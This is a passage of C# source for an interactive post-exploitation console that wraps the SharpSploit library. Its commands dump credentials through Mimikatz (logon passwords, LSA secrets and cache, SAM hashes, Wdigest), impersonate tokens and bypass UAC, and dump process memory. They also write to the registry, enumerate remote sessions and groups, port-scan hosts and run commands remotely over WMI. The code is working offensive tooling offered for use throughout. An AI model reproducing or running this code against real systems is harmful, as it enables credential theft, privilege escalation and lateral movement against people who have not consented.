private static void netSessions(String[] request)
{
var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
var a = SharpSploit.Enumeration.Net.GetNetSessions(request[1], Creds);
foreach (var i in a)
{
Console.WriteLine(i);
}
}
private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args)
{
try
{
SharpSploit.Enumeration.Domain.Credential creds = null;
string domain = "", server = "", searchBase = "", searchString = "";
System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree;
int resultPageSize = 200;
TimeSpan serverTimeLimit = default(TimeSpan);
bool tombStone = false;
System.DirectoryServices.SecurityMasks securityMasks = 0;
string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-username") > -1)
{
if (Array.IndexOf(argsLower, "-password") > -1)
{
creds = new SharpSploit.Enumeration.Domain.Credential(args[Array.IndexOf(args, "-username") + 1], args[Array.IndexOf(args, "-password") + 1]);
Console.WriteLine(args[Array.IndexOf(args, "-password") + 1]);
}
else
{
Console.WriteLine("Error, if providing credentials you must provide both a username and password");
return(null);
}
}
if (Array.IndexOf(argsLower, "-domain") > -1)
{
domain = args[Array.IndexOf(args, "-domain") + 1];
}
if (Array.IndexOf(argsLower, "-server") > -1)
{
server = args[Array.IndexOf(args, "-server") + 1];
}
if (Array.IndexOf(argsLower, "-searchbase") > -1)
{
searchBase = args[Array.IndexOf(args, "-searchbase") + 1];
}
if (Array.IndexOf(argsLower, "-searchstring") > -1)
{
searchString = args[Array.IndexOf(args, "-searchstring") + 1];
}
var gather = new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks);
return(gather);
}
catch
{
Console.WriteLine("Error Generating Domain Searcher Object");
return(null);
}
}
static void Main(string[] args)
{
if (args.Length <= 0)
{
string asci =
@"
_________.__ _________ .__ .__ __
/ _____/| |__ _____ _____________ / _____/_____ | | ____ |__|/ |_
\_____ \ | | \\__ \\_ __ \____ \\_____ \\____ \| | / _ \| \ __\
/ \| Y \/ __ \| | \/ |_> > \ |_> > |_( <_> ) || |
/_______ /|___| (____ /__| | __/_______ / __/|____/\____/|__||__|
\/ \/ \/ |__| \/|__| ";
string console = "@ [Console Edition]@@" +
" Written by anthemtotheego@@" +
"@" +
" Type help or ? to show menu options@@@@";
console = console.Replace("@", System.Environment.NewLine);
Console.WriteLine(asci);
Console.WriteLine(console);
}
while (true)
{
Console.Write("SharpSploitConsole:> ");
//Get command from user and process
String command = RL();
String error = ER();
Char delimiter = ' ';
String[] request = command.Split(delimiter);
//exit program
if (request[0] == "exit")
{
Environment.Exit(0);
}
else if (request[0] == "help" || request[0] == "?")
{
Console.WriteLine();
Console.WriteLine("SharpSploit Credentials Commands");
Console.WriteLine("--------------------------------");
Console.WriteLine();
Console.WriteLine("Mimikatz");
Console.WriteLine("--------");
Console.WriteLine();
Console.WriteLine("Mimi-All Executes everything but DCSync - requires admin");
Console.WriteLine("Mimi-Command Executes a chosen Mimikatz command");
Console.WriteLine("logonPasswords Runs privilege::debug sekurlsa::logonPasswords - requires admin");
Console.WriteLine("LsaCache Retrieve Domain Cached Credentials hashes from registry - requires admin");
Console.WriteLine("LsaSecrets Retrieve LSA secrets stored in registry - requires admin");
Console.WriteLine("SamDump Retrieve password hashes from the SAM database - requires admin");
Console.WriteLine("Wdigest Retrieve Wdigest credentials from registry");
Console.WriteLine();
Console.WriteLine("Tokens");
Console.WriteLine("------");
Console.WriteLine();
Console.WriteLine("whoami Retrieve current user");
Console.WriteLine("GetSystem Impersonate system user, requires admin rights");
Console.WriteLine("BypassUAC Bypass UAC, requires binary, command | path to binary - requires admin rights");
Console.WriteLine("RevertToSelf Ends the impersonation of any token, reverts back to initial token associated with current process");
Console.WriteLine();
Console.WriteLine("SharpSploit Enumeration Commands");
Console.WriteLine("--------------------------------");
Console.WriteLine();
Console.WriteLine("CurrentDirectory Retrieve current working directory");
Console.WriteLine("DirectoryListing Retrieve current directory listing");
Console.WriteLine("ChangeDirectory Changes the current directory by appending a specified string to the current working directory");
Console.WriteLine("Hostname Retrieve hostname");
Console.WriteLine("ProcessList Retrieve list of running processes");
Console.WriteLine("ProcDump Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin");
Console.WriteLine("Username Retrieve current username");
Console.WriteLine("ReadRegistry Retrieve registry path value, requires full path argument");
Console.WriteLine("WriteRegistry Write to registry, requires full path | value");
Console.WriteLine("NetLocalGroupMembers Retrieve users of local group remotely, requires computername | groupname | username | password");
Console.WriteLine("NetLocalGroups Retrieve local groups remotely, requires computername | username | password");
Console.WriteLine("NetLoggedOnUsers Retrieve current logged on users remotely, requires computername| username | password");
Console.WriteLine("NetSessions Retrieve user sessions remotely, requires computername | username | password");
Console.WriteLine("Ping Ping systems, requires computernames");
Console.WriteLine("PortScan Port scan systems, requires computername | ports");
Console.WriteLine();
Console.WriteLine("SharpSploit Lateral Movement Commands");
Console.WriteLine("--------------------------------");
Console.WriteLine();
Console.WriteLine("WMI Run command remotely via WMI, requires computername | username | password | command - requires admin");
Console.WriteLine();
Console.WriteLine();
}
//SharpSploit Credential Modules
//Mimikatz class begin
else if (request[0] == "Mimi-All")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.All();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "Mimi-Command")
{
try
{
List <string> clist = new List <string>();
clist = String.Join(" ", request).Split(' ').Skip(1).ToList();
command = String.Join(" ", clist);
var a = SharpSploit.Credentials.Mimikatz.Command(command);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "logonPasswords")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.LogonPasswords();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "LsaCache")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.LsaCache();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "LsaSecrets")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.LsaSecrets();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "SamDump")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.SamDump();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "Wdigest")
{
try
{
var a = SharpSploit.Credentials.Mimikatz.Wdigest();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
//Token Class Begin
else if (request[0] == "whoami")
{
try
{
SharpSploit.Credentials.Tokens whoami = new SharpSploit.Credentials.Tokens();
var a = whoami.WhoAmI();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "GetSystem")
{
try
{
SharpSploit.Credentials.Tokens getSys = new SharpSploit.Credentials.Tokens();
var a = getSys.GetSystem();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "BypassUAC")
{
try
{
SharpSploit.Credentials.Tokens uac = new SharpSploit.Credentials.Tokens();
int pid = 0;
uac.BypassUAC(request[1], request[2], request[3], pid);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "RevertToSelf")
{
try
{
SharpSploit.Credentials.Tokens revert = new SharpSploit.Credentials.Tokens();
var a = revert.RevertToSelf();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
//SharpSploit Enumeration Modules
else if (request[0] == "CurrentDirectory")
{
try
{
var a = SharpSploit.Enumeration.Host.GetCurrentDirectory();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "DirectoryListing")
{
try
{
var a = SharpSploit.Enumeration.Host.GetDirectoryListing();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "ChangeDirectory")
{
try
{
SharpSploit.Enumeration.Host.ChangeCurrentDirectory(request[1]);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "Hostname")
{
try
{
var a = SharpSploit.Enumeration.Host.GetHostname();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "ProcessList")
{
try
{
var a = SharpSploit.Enumeration.Host.GetProcessList();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "ProcDump")
{
try
{
int pid = Int32.Parse(request[1]);
SharpSploit.Enumeration.Host.CreateProcessDump(pid, request[2], request[3]);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "Username")
{
try
{
var a = SharpSploit.Enumeration.Host.GetUsername();
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "ReadRegistry")
{
try
{
var a = SharpSploit.Enumeration.Host.RegistryRead(request[1]);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "WriteRegistry")
{
try
{
var a = SharpSploit.Enumeration.Host.RegistryWrite(request[1], request[2]);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "NetLocalGroupMembers")
{
try
{
var Creds = new SharpSploit.Enumeration.Domain.Credential(request[3], request[4]);
var a = SharpSploit.Enumeration.Net.GetNetLocalGroupMembers(request[1], request[2], Creds);
foreach (var i in a)
{
Console.WriteLine(i);
}
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "NetLocalGroups")
{
try
{
var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
var a = SharpSploit.Enumeration.Net.GetNetLocalGroups(request[1], Creds);
foreach (var i in a)
{
Console.WriteLine(i);
}
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "NetLoggedOnUsers")
{
try
{
var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
var a = SharpSploit.Enumeration.Net.GetNetLoggedOnUsers(request[1], Creds);
foreach (var i in a)
{
Console.WriteLine(i);
}
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "NetSessions")
{
try
{
var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
var a = SharpSploit.Enumeration.Net.GetNetSessions(request[1], Creds);
foreach (var i in a)
{
Console.WriteLine(i);
}
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "Ping")
{
try
{
int Time = 250;
int Thread = 100;
List <string> clist = new List <string>();
clist = String.Join(" ", request).Split(' ').Skip(1).ToList();
var a = SharpSploit.Enumeration.Network.Ping(clist, Time, Thread);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
else if (request[0] == "PortScan")
{
try
{
int Time = 250;
int Thread = 100;
bool Ping = true;
List <string> plist = new List <string>();
List <int> plist1 = new List <int>();
plist = String.Join(" ", request).Split(' ').Skip(2).ToList();
plist1 = plist.Select(int.Parse).ToList();
var a = SharpSploit.Enumeration.Network.PortScan(request[1], plist1, Ping, Time, Thread);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
//SharpSploit Lateral Movement Modules
else if (request[0] == "WMI")
{
try
{
List <string> clist = new List <string>();
clist = String.Join(" ", request).Split(' ').Skip(4).ToList();
string cmd = string.Join(" ", clist);;
var a = SharpSploit.LateralMovement.WMI.WMIExecute(request[1], cmd, request[2], request[3]);
Console.WriteLine(a);
}
catch
{
Console.WriteLine(error);
}
}
//Unknown command
else
{
Console.WriteLine("unknown command, type help for commandline options");
}
} //End While Loop
} //End Main
